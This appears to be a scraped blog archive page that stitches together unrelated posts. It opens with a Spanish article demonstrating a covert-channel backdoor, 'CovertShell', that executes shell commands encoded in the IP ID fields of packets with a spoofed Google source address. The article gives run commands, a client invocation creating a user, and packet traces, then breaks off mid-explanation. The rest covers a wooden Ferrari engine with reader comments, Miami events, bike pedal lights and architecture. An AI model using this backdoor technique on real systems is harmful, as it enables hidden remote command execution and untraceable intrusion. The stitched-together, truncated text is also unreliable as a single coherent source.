This site is dedicated to all things I see and that I think are interesting to publish almost always are other very smart people.

Archive for October, 2010

Covert Channels

El encubrimiento de canales o Covert Channels es una técnica de evasión que permite a un atacante enviar información empleando para ello las cabeceras de los protocolos de comunicación. En esta entrada trataremos el encubrimiento de canales en el protocolo TCP/IP, y proporcionaremos una herramienta, CovertShell, diseñada para la prueba de concepto. Pueden localizar los fuentes al final de la entrada.

El protocolo TCP/IP presenta una serie de cabeceras que normalmente son inicializadas por el cliente para mantener o numerar una comunicación. La técnica covert channels aprovecha dichos campos para asignarle valores de tal forma que la máquina destino interprete dichos campos no como una forma de mantener una comunicación o aportar información sobre ésta, sino para obtener datos.

Un ejemplo interesante fue desarrollado por Craig H. Rowland en su paper de 1996: Covert Channels in the TCP/IP protocol Suite, donde éste creaba una pequeña herramienta cliente/servidor “CovertTCP” de no mas de 500 líneas que permitía la transferencia de ficheros entre cliente/servidor empleando para ello únicamente los campos SEQ, ACK del protocolo TCP y el campo ID del protocolo IP. De esta forma la información iba en las cabeceras de los protocolos y no en el contenido del paquete o payload.

A raíz de esta idea, siempre se ha pensado en la posibilidad de ir más allá y usar esta técnica para el envío de ordenes de comando. Algo que podría ser usado tanto para puertas traseras (backdoors) como para redes botnet. Imagínense que tenemos un servidor que ha sido comprometido al cual se le ha instalado un servicio que espera paquetes en un cierto puerto con cierto valores en su cabecera. Cuando le llega un paquete que cumple esos requisitos, procesa los valores de las cabeceras convirtiendo dichos valores en ordenes de comando, que son posteriormente ejecutadas.

Siguiendo este modelo hemos creado una pequeña herramienta para la prueba de concepto a raíz del código fuente del CovertTCP, denominada CovertShell, donde disponemos de un servicio que emplea un socket RAW de tal forma que al recibir en el puerto indicado paquetes con el bit ACK y sin el bit SYN, obtiene el identificador de la cabecera IP, el cual es el número identificativo correspondiente a una letra en código ASCII. Dicha letra es almacenada en un vector. Cuando llegan 3 paquetes cuyo ID es 255, el servidor ejecuta la orden de comando que hay almacenada en el vector. Por tanto disponemos de un servidor que no abre ningún puerto, que realmente escucha el tráfico y que es capaz de interpretar la cabecera IP para generar comandos. Dicho de otra forma, tenemos una puerta trasera empleando covert channels para comunicarse. ¿Lioso? Veamos un ejemplo de funcionamiento:

Compilamos y ejecutamos el servicio que espere paquetes en el puerto 8888 en la máquina víctima (servidor):

# gcc servidor.c -o servidor
# ./servidor -port 8888

En otra consola comprobamos que el proceso está levantado y que no hay ningún servicio escuchando en el puerto 8888:

# ps aux | grep servidor | grep -v grep
root      2465  0.0  0.0   3908   312 pts/0    S+   09:53   0:00 ./servidor -port 8888
# netstat -putan | grep 8888
# lsof -Pi | grep 8888

A continuación vamos a emplear un pequeño script en bash, agradecer la ayuda a Raúl Rodriguez (no te escondas), que requiere tener instalado el binario Nemesis (permite manipular paquetes de forma sencilla). A dicho script le pasamos una orden entre comillas, de tal forma que generará un paquete por cada letra, donde el valor ID del campo IP, será el valor ASCII de la letra indicada.

Dentro del script tenemos la variable IP_DST y DPORT donde hay que indicar la IP y puerto de nuestro servidor víctima. También tenemos las variables IP_ORIGEN y SPORT donde se indica la IP y Puerto origen (puede ser cualquiera). Para el POC vamos a indicar a Nemesis que la dirección IP de origen es la de un servidor de Google y el puerto origen es el 80. De esta forma al servidor víctima le llegarán paquetes con el flag ACK con IP origen de Google y el puerto 80.

De este modo, si leemos la traza de red veremos únicamente que están llegando paquetes ACK de google, algo de lo más normal, cuando realmente lo que nos está llegando son comandos de una backdoor.

Para esta demo vamos a crear el usuario “ximo” (que me han dicho que es muy peligroso) en la máquina víctima:

Cliente:

# ./cliente.sh "useradd ximo"
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
TCP Packet Injected
#

Servidor:

# ./servidor -port 8888
Dato recibido: 117
Dato recibido: 115
Dato recibido: 101
Dato recibido: 114
Dato recibido: 97
Dato recibido: 100
Dato recibido: 100
Dato recibido: 32
Dato recibido: 120
Dato recibido: 105
Dato recibido: 109
Dato recibido: 111
Comando: useradd ximo

¿Habrá funcionado?

# tail -1 /etc/passwd
ximo:x:1002:1002::/home/ximo:/bin/sh
#

Ahora vamos a ver la traza de red desde el servidor (IP 172.17.X.X) cuando se ha enviado el comando “useradd ximo”. En este caso recordar que hemos usado la IP de Google, por lo que la IP origen usada es “66.249.92.104″ obtenida de un simple ping:

$ ping -c1 google.es
PING google.es (66.249.92.104) 56(84) bytes of data.

Veamos la traza:

# tcpdump -nn -vvv -i eth0 port 8888
10:00:55.265912 IP (tos 0x0, ttl 254, id 117, offset 0, flags [none], proto TCP (6),
    length 40)
    66.249.92.104.80 > 172.17.X.X.8888: Flags [.], cksum 0x2912 (correct),
    seq 283280788, ack 1457724121, win 4096, length 0
10:00:55.265964 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
    172.17.X.X.8888 > 66.249.92.104.80: Flags [R], cksum 0xcf94 (correct), seq
    1457724121, win 0, length 0
10:00:55.270636 IP (tos 0x0, ttl 254, id 115, offset 0, flags [none], proto TCP (6),
    length 40)
    66.249.92.104.80 > 172.17.X.X.8888: Flags [.], cksum 0x2909 (correct), seq
    1069023501, ack 78166684, win 4096, length 0
10:00:55.270669 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
    172.17.X.X.8888 > 66.249.92.104.80: Flags [R], cksum 0x1051 (correct), seq
    1535890804, win 0, length 0
10:00:55.280132 IP (tos 0x0, ttl 254, id 101, offset 0, flags [none], proto TCP (6),
    length 40)
    66.249.92.104.80 > 172.17.X.X.8888: Flags [.], cksum 0x827f (correct), seq
    1249543965, ack 4145208809, win 4096, length 0
10:00:55.280157 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
    172.17.X.X.8888 > 66.249.92.104.80: Flags [R], cksum 0xfa99 (correct), seq
    1307965633, win 0, length 0
10:00:55.284502 IP (tos 0x0, ttl 254, id 114, offset 0, flags [none], proto TCP (6),
    length 40)
    66.249.92.104.80 > 172.17.X.X.8888: Flags [.], cksum 0x5a89 (correct), seq
    4108084880, ack 626806209, win 4096, length 0

Al servidor nos han llegado una serie de paquetes TCP con flag ACK ([.]) desde la IP de Google (66.249.92.104), con puerto origen 80 sin payload, al cual hemos respondido con un paquete RST. Si nos fijamos en los paquetes de envío veremos el campo “id número”, que identifica el valor del campo id del protocolo IP, el cual tiene valores como 117, 115, 101, 104, … que corresponden con los valores ASCII de u, s, e, r, …

Como podréis suponer, la posibilidad de rastrear ese comando es realmente compleja puesto que en ningún momento nos llega la IP del atacante ya que se falsifica la IP origen.

Pero vayamos más allá: ¿qué ocurriría si en vez de jugar con la cabecera ID del protocolo IP, usáramos el valor de secuencia (SEQ) del paquete TCP, de tal forma que enviáramos un paquete TCP con flag SYN (inicio de conexión) a un servidor público cuya IP y puerto origen sea la de la víctima? Pues que el servidor público contestaría a la víctima con un paquete SYN ACK al puerto indicado como puerto origen, cuyo valor ACK corresponderá al valor de sesión enviado por el atacante + 1. Por tanto se podría usar servidores públicos legítimos para que mandaran en la cabecera TCP la orden a ejecutar, siendo todavía más difícil rastrear quien ejecutó la orden. Veamos una imagen que aclara esta idea:


Motor de Ferrari hecho de madera

En eBay se pueden encontrar las cosas más sorprendentes, incluyendo este motor de Ferrari hecho de madera que fue puesto a la venta por un australiano. En la descripción de ventas dice:

El motor completo, incluyendo el colector, están hechos de madera. El motor está basado en el 365GTB V12 de Ferrari. Es más o menos del mismo tamaño que el motor original y pesa unos 25kg”.

Lamentablemente no se puede llegar a ninguna parte metiendo este motor en un auto, porque no funciona más que para ponerlo de adorno. Y si te gustaría tenerlo en alguna esquina de tu casa, tendrás que desembolsar nada menos que US$6.000, antes de que alguien más se lo lleve.

Link: Ferrari 365 V12 engine (eBay vía Bólido)

Sección Anterior
Próxima Sección

1. Intro
2. Monopolio
3. ¿Y el usuario?

–>

Acerca del Autor

Cony SturmCony Sturm
Periodista de la Universidad Católica de Chile, trabajó 2 años en Diario Financiero y después decidió irse a FayerWayer a luchar contra trolls. También edita Wayerless. Se va al trabajo en bicicleta y cuando tiene tiempo, juega World of Warcraft. En Twitter es @conysturm.

ResponderCancelaravatar‘+user+’ dice’;
$(‘#’+span).html(img);
},

showComment: function(comment_id)
{
$(‘#comment-‘+comment_id).removeClass(‘collapsed’);
$(‘#comment-‘+comment_id+ ” .avatar”).show();
$(‘#comment-‘+comment_id+ ” .comm_mod”).show();
$(‘#comment-‘+comment_id+ ” .comment_content”).show();

if($(‘#comment-‘+comment_id+” .comm_tit .read_comment”).find(‘a’)) {
$(‘#comment-‘+comment_id+” .comm_tit .read_comment”).find(‘a’).remove();
$(‘#comment-‘+comment_id+” .comm_tit .read_comment”).append(‘Colapsar …‘);
} else {
$(‘#comment-‘+comment_id+” .comm_tit”).append(‘Colapsar …‘);
}
},

hideComment : function(comment_id, votes)
{
$(‘#comment-‘+comment_id).removeClass(‘destacado’);
$(‘#comment-‘+comment_id).addClass(‘collapsed’);

if($(‘#comment-‘+comment_id+” .comm_tit .read_comment”).find(‘a’)) {
$(‘#comment-‘+comment_id+” .comm_tit .read_comment”).find(‘a’).remove();
$(‘#comment-‘+comment_id+” .comm_tit .read_comment”).append(‘Ver Comentario…‘);
} else {
$(‘#comment-‘+comment_id+” .comm_tit”).append(‘Ver Comentario…‘).show();
}

$(‘#comment-‘+comment_id+” .avatar”).hide();
$(‘#comment-‘+comment_id+” .comm_mod”).hide();
$(‘#comment-‘+comment_id+” .comment_content”).hide();
$(‘#karma-‘+comment_id).text(votes);
},

featuredComment: function(comment_id, votes) {
$(‘#comment-‘+comment_id).removeClass(‘collapsed’);
$(‘#comment-‘+comment_id).addClass(‘destacado’);
$(‘#karma-‘+comment_id).text(votes);
},

karma: function(type, comment_id) {
$.get(“/wp-content/plugins/karma.php?action=” + type + “&comment_id=” + comment_id, function(data) {
var value = parseInt(data);
if(isNaN(value) == true) {
return;
} else if(value = 10) {
Social.featuredComment(comment_id, value);
} else {
$(‘#karma-‘+comment_id).text(value);
}
});
}
}

30 Comentarios

Motor de Ferrari hecho de madera



Desaprobar
Aprobar
-3



leo
dijo hace 16 horas

Es como el celular de palo ?


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
-2



slayerkof
dijo hace 16 horas

aunque sea un celular de palo se puede poner a funcionar 😀



Desaprobar
Aprobar
9



Jack
dijo hace 16 horas

los notebooks de piedra?



Desaprobar
Aprobar
17



picao
dijo hace 16 horas

Deja de publicar tonteras cony!


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
-6



Alexander Schek
dijo hace 16 horas

JAJAJA que pasa CONY no funciona la pagina engadget??

y dime… cual es la dosis diaria de tecnología en español en esa “brillante” nota?


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
1



Alex
dijo hace 16 horas

En serio no tiene nada de Tech, simplemente no hayan como promocionar BOLIDO son unos bolidos juajuajua



Desaprobar
Aprobar
16



Leonardo
dijo hace 16 horas

jajajaja cuando escribes ManzanaWayer desaparece el comentario….libertad de expresión truncada???


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
1



Jack
dijo hace 16 horas

(inserte comentario mamon)

puta los wns pesados xD


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
15



enials
dijo hace 16 horas

así es la libertad de expresión, los flaites ya no rayan en los baños, se meten a los blogs a escribir estupideces…



Desaprobar
Aprobar
-4



TheRegisterWayer
dijo hace 16 horas

Buta que webean con estas noticias tan tecnológicas. Cony no porque aparezca en The Register, debes hacer forward….


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
4



Matmoz
dijo hace 16 horas

Bonito, pero caro


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
3



MoDeM
dijo hace 16 horas

buen trabajo, considero q son la raja los trabajos en madera


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
14



enzoscuro
dijo hace 16 horas

Un autentico motor de combustion externa 😄 jajajajaja


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
6



Neurotools
dijo hace 16 horas

¿Cómo es esto de “vía Bólido”? ¿No sería lo correcto citar la fuente original y no otro Blog de la red Betazeta? Digo porque…
– Fayerwayer cita a Bólido
– Bólido cita a GearFuse
– GearFuse cita a Gizmowatch
– Gizmowatch cita a blog Automobile
…a quienes parece haberles parecido importante esta noticia. 🙂


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
5



alex
dijo hace 15 horas

no hayan como citar su nueva mierda de blog



Desaprobar
Aprobar
1



SpeakF1
dijo hace 15 horas

No se metan con la Cony ñoños! Prefiero mil, que digo, un millón de veces a la Conycita linda que al watón chanta asqueroso (u know who is…).
Y a mi si me pareció interesante la nota!!


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
10



antiapple
dijo hace 15 horas

Debe haber algun error. Siendo esto manzanawayer no aparece apple en la noticia. Ahh ahí está… en el precio… $6000 solo para ser “admirado” y cero utilidad
saludos!


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
7



Marco
dijo hace 15 horas

Comprador : Esteeeee ….¿ y como funciona el motor ?
Vendedor : Lo puede poner en aun auto de bambú

Comprador : ¿ Y como me trasladaría ?
Vendedor : De bajadita noma’

😄


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
4



Adrián
dijo hace 13 horas

nopo wn, funciona a lo picapiedra



Desaprobar
Aprobar
3



sigfried2.01
dijo hace 15 horas

Se exigen despidos masivos en fayerwayer!!!! hasta el icarito esta mas entretenido y tecno.


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
1



^^!
dijo hace 7 horas

Vaya a leer icarito ntonces… a mi y a muchos mas nos intereso… si no les gusta, no comenten y pasen de largo!… simple 🙂



Desaprobar
Aprobar
2



What!!
dijo hace 15 horas

ya debieran cambiar el slogan de “Dosis diarias de tecnología en español.™”, confunde a la gente.


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
-1



^^!
dijo hace 4 horas

Tarea pa’ la casa…

@What!!… define tecnologia ;)!… cuando termines vuelves!



Desaprobar
Aprobar
6



What!!
dijo hace 15 horas

en todo caso, para no ser tan malo, doy una pequeña ayudita con algunos temas que podrían tocar:
Unity por defecto para Ubuntu 11.04 desktop
Lanzamiento de Lotus Symphony 3
Messenger 8 para Mac
Adobe Rome
Mejoras en Feedburner de Google


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
2



jexu
dijo hace 14 horas

increible que no hayan comentado nada del adobe rome



Desaprobar
Aprobar
2



gaarv
dijo hace 14 horas

¿no buscaban propulsion ecologica? 😀


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
1



like.a.cactoos
dijo hace 10 horas

Hermoso!!! claro no deja de ser una estupidez gastar semejante cantidad de plata en esto, pero dentro de las estupideces que planeo colocar en el comedor de mi casa, esta quedaría perfecto sobre la mesa de centro.


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
2



Fabio
dijo hace 10 horas

esa wea debería estar en un museo

SL2


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
-1



ffff
dijo hace 7 horas

ManzanaWayer


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar



Desaprobar
Aprobar
1



sergio
dijo hace 6 horas

es una buena manera de mostrar que motores menores a combustión a base de petroleo serán una reliquia.


Responder

Responder Comentario

Comentar sin RegistroComentar con Beta ID–>

Publicar

Deja tu Comentario

Publicar

La opción de comentar está abierta a todos los usuarios, pero te pedimos por favor mantenerte dentro del tema del artículo y no publicar comentarios ofensivos o publicidad basura. Nos reservamos el derecho de eliminar cualquier comentario que no cumpla estas reglas.

–>

Deja tu Comentario

Comentar sin Registro –>
Comentar con Beta ID –>

Publicar

La opción de comentar está abierta a todos los usuarios, pero te pedimos por favor mantenerte dentro del tema del artículo y no publicar comentarios ofensivos o publicidad basura. Nos reservamos el derecho de eliminar cualquier comentario que no cumpla estas reglas.

Para que aparezca tu foto en vez del icono genérico en tu comentario, el email con el que comentas debe estar inscrito en Gravatar.

FayerWayer Labs »

Nuestras pruebas de los impresentables e imperdibles de la tecnología.

nwz-w252
NEX-5K_Negro_5
plattan4
infinia_077
USB-HDTV_01
Office-2010-FayerWayer-Edition
cx680
Alienware_M11x
IMG_0374

Dosis diarias de tecnología en español.™

una comunidad

Betazeta Networks


Domino tourney raises $$$ for Down Syndrome

Domino tourney raises $$$ for Down Syndrome

dominos1

The Mayfair Promenade was overtaken by a domino tournament on Saturday. From noon until night, there were games, food, music and lots of fun all to raise money for the Down Syndrome Association of Miami.

dominos2

The Three Stogies cigar lounge sponsored the event along with Casa Vana restaurant and Pantry Liquors.

dominos4

Pimped out Harleys lined the promenade as a featured attraction.

dominos5

dominos6

dominos7

We caught our friend Nelsy Rivas enjoying a nice fresh cigar, late into the night, while playing with a toy plane, courtesy of Paul’s Sunglasses (and toy planes) Kiosk.

posted by Grapevine at 9:00 AM

Bookmark and Share


All the color is brightening up that dark corner


Pedalite, los pedales que te iluminan en cualquier dirección [Review Gizmodo]

¿Cansado de que las luces de tu bici gasten pilas o usen dinamos ruidosas e ineficientes? Quizás deberías probar los pedales con luces Pedalite. No necesitan pilas y que funcionan con sólo pedalear y no tienen botones ni tienes que prepararlos especialmente. Son sencillos, ecológicos y además te iluminan lateralmente, que es donde realmente importa en las verdaderas situaciones de riesgo como los cruces. Descúbrelos tras el salto.

Si estás acostumbrado a usar la bici de noche probablemente te habrás llevado algún susto alguna vez. Es normal, las luces que hay en el mercado están pensadas para señalizarte de frente y de espaldas, pero los lados son los grandes olvidados. De hecho el 75% de los accidentes pasa en los cruces donde los lados de la bici son la única parte visible.

Los pedales Pedalite te ofrecen un sistema de 3 luces leds, blancas al frente, ámbar en el lateral y rojas detrás, por lo que te iluminan y hacen visible desde cualquier ángulo. Además se aprecian hasta en una distancia de 1 kilómetro.

Lo mejor es que funcionan simplemente pedaleando, no son necesarias baterías ya que usan un sistema patentado que aprovechar la energía cinética para alimentar los leds y que consigue además que cuando paras de pedalear siguen funcionando durante 5 minutos, por lo que se siguen viendo aunque te pares en cruces o semáforos.

Están hechos de plástico y metal, con unos pequeños tacos metálicos que proporcionan gran agarre. Son resistentes a los golpes y al agua, y además de las luces disponen de reflectores y un sistema para acoplarles punteras para una mejor sujeción.

Podéis comprar los pedales Pedalite en su distribuidor oficial español Avantum por 52,95 € o 63,90 con las punteras.

Aparte de los pedales Pedalite, la empresa también produce unas luces que se recargan con energía solar. Por un lado tienen las bandas Anklelite por 20,95 € y que se pueden colocar en las piernas y brazos, y también el Baglite por 39,95 € que dispone de 3 luces, 2 frontales y 1 trasera, que se pueden colocar o en una mochila o usarse directamente como un arnés. Estos productos resultan también muy útiles para correr o en hípica y están también disponibles en la tienda Avantum.

Lo bueno
·Visibles en 360 grados y muy brillantes.
·Luces de diferentes colores para reconocer tu posición y dirección fácilmente.
·No necesitan mantenimiento.
·Resistentes a los golpes y al agua.
·Garantía total durante un año.

Lo malo
·Si haces ciclismo extremo los pedales pueden resentirse con los golpes realmente duros.

Veredicto
Sencillamente una idea genial. Las luces se ven desde cualquier ángulo y no tienes que preocuparte de baterías ni nada gracias a un mínimo aumento de resistencia en el pedaleo prácticamente inapreciable. Tras un accidente a 25 km/h en el que un pedal chocó directamente seguía funcionando aunque hacía un ruido extraño, la garantía y el servicio post venta genial, me cambiaron el pedal sin pedirme ninguna explicación. Al final del artículo podéis ver un vídeo en el que comparo unas luces simple de 1 LED con los productos Pedalite y se puede apreciar como ofrecen mucha más visibilidad en cualquier ángulo.— Dani Burón [Pedalite]

YouTube Preview Image

YouTube Preview Image


Railroad Tracks on North Miami Avenue Repaired

 

A thank you to the Public Works Department for repairing the asphalt around the railroad tracks on North Miami Avenue. This repair was needed. I can personally attest to the danger of crossing here.  A few months ago I totaled my rear rim and nearly fell of my bike while crossing the tracks. On a recent Critical Mass ride about thirty people fell while crossing the tracks. I personally know a young lady that crashed while crossing here too.

Share


The food was the work of art in the gallery

The food was the work of art in the gallery

rodez1

The Young Patronesses of the Opera (YPO) had a special fundraiser at the Rodez Gallery at CocoWalk last week. They were raising funds for their upcoming 55th Annual Gala, “An Evening in Casablanca” which will take place on Saturday, October 30 at the Riviera Country Club in Coral Gables. Above are Barbara Reese, artist George Rodez, Nancy Schwartz, and Vivian More all from YPO.

rodez5

YPO is a non-profit organization whose mission is to “cultivate, promote, foster, sponsor, educate and develop the understanding, taste and love of opera in our community.”

Educating children is a very important goal of YPO. Promoting an appreciation and exposing young children to opera and classical music is needed to help the genre survive.

rodez4

As you can see, the YPO knows how to throw an event. The gallery event was all about the food, which were works of art themselves and fit in perfectly with the surrounding art at the gallery.

rodez3

For more info on the upcoming gala and to see the incredible silent auction items available, please visit their website at: http://www.ypo-miami.org.

rodez2

posted by Grapevine at 9:00 AM

Bookmark and Share


Joya Rocker by Monte Design

joya rocker 1

The new Joya Rocker by Monte Design won’t be available until January 2011, but we got a sneak look at it. Designed by Ralph and Michelle Montemurro, the Joya Rocker is a fully upholstered and comfortable chair, with a solid wood base in either white or solid American walnut.

joya rocker 2

joya rocker 3

joya rocker 4


Representative Luis Garcia to host a meet and greet to discuss Brickell Avenue resurfacing project

October 21, 2010
3:30 pm to 7:00 pm

Representative Luis Garcia will host a meet and greet to discuss the FDOT Brickell Avenue resurfacing project this Thursday, October 21 at Lolita’s.

If you live, work, or play on Brickell Avenue it is important that you attend this meeting. This project will have a tremendous impact on your daily lives and on businesses that operate in the area.

Share


Oblique House B in Japan by Cell Space Architects

Oblique House 6

This private residence designed by Cell Space Architects was built in the Kanagawa Prefecture in Japan. Boasting 2300 square feet, the interior of this hose has all the typical Japanese materials: maple wood floors, pristine white walls and Shoji dividers. There are clear glass dividers in the bathroom, which makes the whole area feel bigger and clearer. I like the monotone grayscale palette used on the outside of the house, which contrasts nicely with the greenery and rocks.

Oblique House 7

Oblique House 9

Oblique House 2

Oblique House 1

Oblique House 5

Oblique House 4

Oblique House 3

Oblique House 8

Location: Kanagawa, Japan
Type: Residence
Materials: Reinforced concrete
Area: 2314 square feet
Completed: July 2009
Photos: Masao Nishikawa